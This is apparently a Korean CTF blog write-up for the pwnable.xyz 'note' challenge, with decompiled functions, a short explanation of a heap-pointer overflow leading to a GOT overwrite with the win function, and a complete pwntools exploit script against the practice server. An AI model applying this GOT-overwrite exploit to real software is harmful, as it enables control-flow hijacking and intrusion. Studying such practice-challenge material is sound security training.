pwnable.xyz - note
2021. 9. 11. 10:52ㆍPwnable
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // eax
setup(argc, argv, envp);
puts("Note taking 101.");
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
print_menu();
v3 = read_int32();
if ( v3 != 1 )
break;
edit_note();
}
if ( v3 != 2 )
break;
edit_desc();
}
if ( !v3 )
break;
puts("Invalid");
}
return 0;
}edit note
void edit_note()
{
int v0; // [rsp+4h] [rbp-Ch]
void *buf; // [rsp+8h] [rbp-8h]
printf("Note len? ");
v0 = read_int32();
buf = malloc(v0);
printf("note: ");
read(0, buf, v0);
strncpy(s, buf, v0);
free(buf);
}edit_desc
ssize_t edit_desc()
{
if ( !buf )
buf = malloc(32uLL);
printf("desc: ");
return read(0, buf, 32uLL);
}exploit 과정은 아래와 같다.
- s 변수의 overflow 를 이용해서 buf 를 read_got으로 덮음
- edit_desc를 이용해서 read_got 을 win 함수로 덮음
- read 를 재 호출해서 exploit함
from pwn import *
#r = process("./challenge")
r = remote("svc.pwnable.xyz", 30016)
e = ELF("./challenge")
l = e.libc
context.log_level = "debug"
win_add = e.sym['win']
read_got = e.got['read']
pay = ""
pay += "A"*0x20
pay += p64(read_got)
r.sendafter("> ", "1")
r.sendafter("Note len? ", str(len(pay)))
r.sendafter("note: ", pay)
r.sendafter("> ", "2")
r.sendafter("desc: ", p64(win_add))
r.sendafter("> ", "1")
print(r.recv())'Pwnable' 카테고리의 다른 글
| pwnable.xyz - TLSv00 (0) | 2021.09.29 |
|---|---|
| dreamhack.io - tcache_dup (0) | 2021.09.26 |
| dreamhack.io - house_of_spirit (0) | 2021.09.08 |
| dreamhack.io - iofile_vtable (0) | 2021.09.07 |
| dreamhack.io - WEB_2021A_Medium (0) | 2021.09.05 |